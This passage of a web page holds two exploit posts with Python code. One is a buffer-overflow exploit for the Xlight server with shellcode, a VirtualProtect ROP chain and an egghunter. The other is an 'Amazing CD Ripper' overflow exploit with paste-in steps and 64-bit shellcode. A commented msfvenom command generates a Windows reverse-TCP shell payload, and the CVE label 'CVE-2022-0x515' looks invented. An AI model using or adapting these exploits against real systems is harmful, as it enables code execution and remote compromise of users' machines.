(C:\Windows\SYSTEM32\ODBC32.dll)<br />## 0x74b20000 | 0x74bbc000 | 0x0009c000 | True | True | True | False | True | 10.0.17763.1 [apphelp.dll] (C:\Windows\SYSTEM32\apphelp.dll)<br />## 0x76280000 | 0x76297000 | 0x00017000 | True | True | True | False | True | 10.0.17763.1 [win32u.dll] (C:\Windows\System32\win32u.dll)<br />## 0x75c50000 | 0x761a6000 | 0x00556000 | True | True | True | False | True | 10.0.17763.1911 [SHELL32.dll] (C:\Windows\System32\SHELL32.dll)<br /><br /><br />##0x006d4270 : kernel32.loadlibrarya | 0x76ce2280 | startnull,asciiprint,ascii,alphanum {PAGE_READWRITE} [xlight.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v3.9.3.2 (C:\Users\Tarnished\Desktop\Xlight\xlight.exe)<br />##0x006d4258 : comdlg32.getopenfilenamea | 0x77226240 | startnull,asciiprint,ascii,alphanum {PAGE_READWRITE} [xlight.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v3.9.3.2 (C:\Users\Tarnished\Desktop\Xlight\xlight.exe)<br />##0x006d427c : kernel32.virtualprotect | 0x76ce0c10 | startnull,asciiprint,ascii {PAGE_READWRITE} [xlight.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v3.9.3.2 (C:\Users\Tarnished\Desktop\Xlight\xlight.exe)<br />##0x006d4278 : kernel32.getprocaddress | 0x76ce05a0 | startnull,asciiprint,ascii,alphanum {PAGE_READWRITE} [xlight.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v3.9.3.2 (C:\Users\Tarnished\Desktop\Xlight\xlight.exe)<br /># RopFunc syscall null <br />badchars = [0x00,0x0a,0x0d,0x3a,0xff]<br /><br />buf = b""<br />buf += b"\xd9\xeb\x9b\xd9\x74\x24\xf4\x31\xd2\xb2\x77\x31\xc9"<br />buf += b"\x64\x8b\x71\x30\x8b\x76\x0c\x8b\x76\x1c\x8b\x46\x08"<br />buf += b"\x8b\x7e\x20\x8b\x36\x38\x4f\x18\x75\xf3\x59\x01\xd1"<br />buf += b"\xff\xe1\x60\x8b\x6c\x24\x24\x8b\x45\x3c\x8b\x54\x28"<br />buf += b"\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x34"<br />buf += b"\x49\x8b\x34\x8b\x01\xee\x31\xff\x31\xc0\xfc\xac\x84"<br />buf += b"\xc0\x74\x07\xc1\xcf\x0d\x01\xc7\xeb\xf4\x3b\x7c\x24"<br />buf += b"\x28\x75\xe1\x8b\x5a\x24\x01\xeb\x66\x8b\x0c\x4b\x8b"<br />buf += b"\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8\x89\x44\x24\x1c"<br />buf += b"\x61\xc3\xb2\x08\x29\xd4\x89\xe5\x89\xc2\x68\x8e\x4e"<br />buf += b"\x0e\xec\x52\xe8\x9f\xff\xff\xff\x89\x45\x04\xbb\xef"<br />buf += b"\xce\xe0\x60\x87\x1c\x24\x52\xe8\x8e\xff\xff\xff\x89"<br />buf += b"\x45\x08\x68\x6c\x6c\x20\x41\x68\x33\x32\x2e\x64\x68"<br />buf += b"\x75\x73\x65\x72\x30\xdb\x88\x5c\x24\x0a\x89\xe6\x56"<br />buf += b"\xff\x55\x04\x89\xc2\x50\xbb\xa8\xa2\x4d\xbc\x87\x1c"<br />buf += b"\x24\x52\xe8\x5f\xff\xff\xff\x68\x6f\x78\x58\x20\x68"<br />buf += b"\x61\x67\x65\x42\x68\x4d\x65\x73\x73\x31\xdb\x88\x5c"<br />buf += b"\x24\x0a\x89\xe3\x68\x58\x20\x20\x20\x68\x61\x69\x72"<br />buf += b"\x79\x68\x61\x70\x20\x5a\x68\x20\x48\x65\x6a\x68\x30"<br />buf += b"\x64\x61\x79\x31\xc9\x88\x4c\x24\x10\x89\xe1\x31\xd2"<br />buf += b"\x52\x53\x51\x52\xff\xd0\x31\xc0\x50\xff\x55\x08"<br /><br /><br />def Hejap_rop_chain():<br /><br /> Hejap_gadgets = [<br /> 0x75c4f468, # POP EBX # RETN [windows.storage.dll] ** REBASED ** ASLR <br /> 0x7731c2a0, # ptr to &VirtualProtect() [IAT CRYPT32.dll] ** REBASED ** ASLR<br /> 0x75deb176, # MOV ESI,DWORD PTR DS:[EBX] # RETN [windows.storage.dll] ** REBASED ** ASLR <br /> #[---INFO:gadgets_to_set_ebp:---]<br /> 0x7545eebb, # POP EBP # RETN [SHLWAPI.dll] ** REBASED ** ASLR <br /> 0x75ff2bdb, # & call esp [msvcp_win.dll] ** REBASED ** ASLR<br /> #[---INFO:gadgets_to_set_ebx:---]<br /> 0x755d53b2, # POP EAX # RETN [KERNELBASE.dll] ** REBASED ** ASLR <br /> 0xfffffdff, # Value to negate, will become 0x00000201<br /> 0x74d241d7, # NEG EAX # RETN [USER32.dll] ** REBASED ** ASLR <br /> 0x75e72ff1, # XCHG EAX,EBX # RETN [windows.storage.dll] ** REBASED ** ASLR <br /> #[---INFO:gadgets_to_set_edx:---]<br /> 0x765a2dad, # POP EAX # RETN [bcryptPrimitives.dll] ** REBASED ** ASLR <br /> 0xffffffc0, # Value to negate, will become 0x00000040<br /> 0x75297b65, # NEG EAX # RETN [gdi32full.dll] ** REBASED ** ASLR <br /> 0x76a3b05a, # XCHG EAX,EDX # RETN [SHELL32.dll] ** REBASED ** ASLR <br /> #[---INFO:gadgets_to_set_ecx:---]<br /> 0x72bb29ef, # POP ECX # RETN [UXTHEME.DLL] ** REBASED ** ASLR <br /> 0x7774f16b, # &Writable location [ntdll.dll] ** REBASED ** ASLR<br /> #[---INFO:gadgets_to_set_edi:---]<br /> 0x77275d3d, # POP EDI # RETN [CRYPT32.dll] ** REBASED ** ASLR <br /> 0x75849686, # RETN (ROP NOP) [KERNEL32.DLL] ** REBASED ** ASLR<br /> #[---INFO:gadgets_to_set_eax:---]<br /> 0x72bf2465, # POP EAX # RETN [UXTHEME.DLL] ** REBASED ** ASLR <br /> 0x90909090, # nop<br /> #[---INFO:pushad:---]<br /> 0x76a37959, # PUSHAD # RETN [SHELL32.dll] ** REBASED ** ASLR <br /> ]<br /> return ''.join(struct.pack('<I', _) for _ in Hejap_gadgets)<br /><br />egg = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"<br />egg+="\xef\xb8\x68\x30\x30\x70\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"<br />rop_chain = Hejap_rop_chain()<br />offset = 452<br />nseh = "\x90" * 4 <br />junk = "A" * (offset - len(nseh))<br />stackpivot = struct.pack('<I', 0x8e648b26 ) # POP ESP # POP EBP # RETN ** [xlight.exe<br />#seh = struct.pack('<I', 0x0019ccb8 ) null<br /><br />buffer = junk + nseh + stackpivot + rop_chain + "\x90" * 5 + egg + 'h00ph00p' + buf + "\x90" * (1000 - len(egg)-len(stackpivot))<br />f = open("0day_hejap.txt", "w")<br />f.write(buffer)<br />f.close()<br /><br /><br /># Proof and Exploit:<br />https://i.imgur.com/jMURHQF.png<br />https://i.imgur.com/aw6hZo2.png<br />#Video<br />https://streamable.com/gmqz5x<br /><br /><br /><br /></code></pre>
<pre><code># Exploit Title: Amazing CD Ripper v1.2 - Buffer Overflow <br /># Exploit Author: Hejap Zairy<br /># Date: 03.08.2022<br /># Software Link: http://www.shelltoys.com/cd_ripper.exe<br /># Software Link: https://web.archive.org/web/20160313071152/http://www.shelltoys.com/cd_ripper.exe<br /># Tested Version: v1.2.1<br /># Tested on: Windows 10 64bit<br /><br /># 1.- Run python code : 0day-Hejap_Zairy.py<br /># 2.- Open 0day_Hejap.txt and copy All content to Clipboard<br /># 3.- Open Amazing CD Ripper and press Enter Code<br /># 4.- Paste the Content of 0day_Hejap.txt into the 'Enter Code'<br /># 5.- Click 'OK'<br /><br /># Author Code By Hejap Zairy<br />#CVE-2022-0x515<br />#!/usr/bin/env python<br /><br />from pwn import *<br /><br />buffer = "\x41" * 1016 <br /># 0x100017a1 : push esp # ret | null {PAGE_EXECUTE_READ} [akrip32.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.0rc2 (C:\Program Files (x86)\Shelltoys\Amazing CD Ripper\akrip32.dll)<br /><br />push_esp = p32(0x100017a1) #push esp ret ret from akrip32.dll<br />nops = "\x90" * 15 #515 tshhh theardlooo love Malware <br />#msfvenom --arch x64 windows/x64/shell_reverse_tcp lhost=ip lport=443 -f python -e x64/shikata_ga_nai -b "\x00\x0a\x0d\x20\xff" <br />#msfvenom --arch x64 -p windows/x64/messagebox TEXT="0day Hejap Zairy" -f python -e x64/shikata_ga_nai EXITFUNC=thread -b "\x00\x0a\x0d\x20\xff"<br />buf = b""<br />buf += b"\xfc\x48\x81\xe4\xf0\xff\xff\xff\xe8\xd0\x00\x00\x00"<br />buf += b"\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b"<br />buf += b"\x52\x60\x3e\x48\x8b\x52\x18\x3e\x48\x8b\x52\x20\x3e"<br />buf += b"\x48\x8b\x72\x50\x3e\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"<br />buf += b"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9"<br />buf += b"\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x3e\x48\x8b\x52"<br />buf += b"\x20\x3e\x8b\x42\x3c\x48\x01\xd0\x3e\x8b\x80\x88\x00"<br />buf += b"\x00\x00\x48\x85\xc0\x74\x6f\x48\x01\xd0\x50\x3e\x8b"<br />buf += b"\x48\x18\x3e\x44\x8b\x40\x20\x49\x01\xd0\xe3\x5c\x48"<br />buf += b"\xff\xc9\x3e\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9"<br />buf += b"\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0"<br />buf += b"\x75\xf1\x3e\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd6"<br />buf += b"\x58\x3e\x44\x8b\x40\x24\x49\x01\xd0\x66\x3e\x41\x8b"<br />buf += b"\x0c\x48\x3e\x44\x8b\x40\x1c\x49\x01\xd0\x3e\x41\x8b"<br />buf += b"\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41"<br />buf += b"\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0"<br />buf += b"\x58\x41\x59\x5a\x3e\x48\x8b\x12\xe9\x49\xff\xff\xff"<br />buf += b"\x5d\x49\xc7\xc1\x00\x00\x00\x00\x3e\x48\x8d\x95\x1a"<br />buf += b"\x01\x00\x00\x3e\x4c\x8d\x85\x2b\x01\x00\x00\x48\x31"<br />buf += b"\xc9\x41\xba\x45\x83\x56\x07\xff\xd5\xbb\xe0\x1d\x2a"<br />buf += b"\x0a\x41\xba\xa6\x95\xbd\x9d\xff\xd5\x48\x83\xc4\x28"<br />buf += b"\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72"<br />buf += b"\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x30\x64\x61\x79"<br />buf += b"\x20\x48\x65\x6a\x61\x70\x20\x5a\x61\x69\x72\x79\x00"<br />buf += b"\x4d\x65\x73\x73\x61\x67\x65\x42\x6f\x78\x00"<br />padding ="C" * (len(buffer) - len(push_esp) - len(nops))<br />payload = buffer + push_esp + nops + buf + padding<br />try:<br /> with open("0day_Hejap.txt","wb") as f:<br /> print("[+] Creating %s Shellcode 0day-Hejap payload.." %len(payload))<br /> f.write(payload)<br /> f.close()<br /> print("[+] File created!")<br />except:<br /> print("[-]File cannot be created")<br /><br /><br /># Proof and Exploit:<br />https://i.imgur.com/3r5sKNo.png<br /><br /></code></pre>